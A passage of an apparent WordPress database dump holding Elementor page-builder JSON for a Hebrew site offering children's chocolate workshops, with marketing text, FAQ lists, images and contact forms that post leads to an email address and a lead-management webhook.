invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34824&lm_key=fa721ea141794a3db374e600fc05ee2c\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1810,364,'_elementor_version','2.7.5'),(1811,364,'_elementor_template_type','wp-post'),(1812,364,'_elementor_pro_version','2.7.3'),(1815,365,'_wp_page_template','elementor_header_footer'),(1816,365,'_elementor_edit_mode','builder'),(1817,365,'_elementor_data','[{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b495af6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1818,365,'_elementor_version','0.4'),(1819,365,'_elementor_template_type','post'),(1821,123,'_elementor_pro_version','2.9.4'),(1824,366,'_wp_page_template','elementor_header_footer'),(1825,366,'_elementor_edit_mode','builder'),(1826,366,'_elementor_data','[{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd 